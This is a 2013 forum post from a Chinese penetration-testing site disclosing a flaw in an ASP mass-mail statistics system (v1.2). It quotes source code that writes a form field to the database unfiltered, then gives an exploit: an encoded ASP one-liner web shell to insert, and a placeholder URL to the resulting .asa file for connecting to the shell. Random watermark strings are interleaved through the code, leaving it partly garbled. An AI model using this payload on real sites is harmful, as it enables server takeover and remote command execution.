中国网络渗透测试联盟
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:14
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
- f; W1 X, ^! W: I4 J
' q# {: U) T9 o! C$ e
IF Request.QueryString("Action")="del" Then
& d- e' Q7 \+ E$ b) s3 Q9 k
ID=Request.QueryString("ID")
$ f# R" b' a$ J( z
IF Countss ("tui","Fenlei",ID )<>0 then
) W- Z( a3 i3 Z# g
'略
0 A% q3 k0 X# [8 y! k' l W9 G
IF Request.QueryString("Action")="Add" Then
0 g: h+ D6 ?. _1 E, i
Tname=Request.Form("Typename")
) y1 a5 ]5 |+ H! P# ^1 ?# I
Set Rs=Server.CreateObject("adodb.Recordset")
: n4 X% d. Y( X+ O2 p4 }
Sql="Select * From Fenlei Order by id Desc "
) m& X! M. O- @9 b$ ] F
Rs.Open Sql,Conn,1,3
% w( i0 h) x& Z; t5 m
Rs.Addnew
" B8 ^) e9 n3 v, O
Rs("Typename")=Tname
+ c. I! i3 {0 h+ S& O
'略
9 |& J6 a( R7 b/ H- W" p1 v
Set Rs=Server.CreateObject("adodb.Recordset")
" a2 q# R& W9 R+ T
Sql="Select * From Fenlei Order by id Desc "
8 ?$ \, c( @+ G7 t
Rs.Open Sql,Conn,1,1
R ^! ~. G4 z9 X* m
'略
: o7 v* v( Y$ d1 b% k
%>
( S; F# K+ A' r
* i7 l! Y8 T# T
7 y0 V; \# i& h( ^+ v/ \
& i% Q& p1 v7 _2 k! e# V
没有过滤,直接写入数据库。
4 }& z- p8 k3 `! M5 d6 u' l3 R
: w: G* B7 }+ Z8 ]0 U, H% F2 ~
利用方法:
2 t! Y- h* w- _ l4 b0 K2 d& K7 C( m
' a/ {9 V; L5 K f, g: q$ x
插入:┼攠數畣整爠煥敵瑳∨≡┩>
- j7 W, @# t* L6 H/ L
4 Y8 ?# ]& M5 w/ n' b# T) L& \, |
; T# ~5 J ?/ `1 p/ e
连接:
http://www.xxx.com/###tongbaner.asa
& s- n8 y: L( O8 E4 N
'默认安装文件:
' o' S! @% W i8 t# `
'install.asp
- G& c& u; r* k* r
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2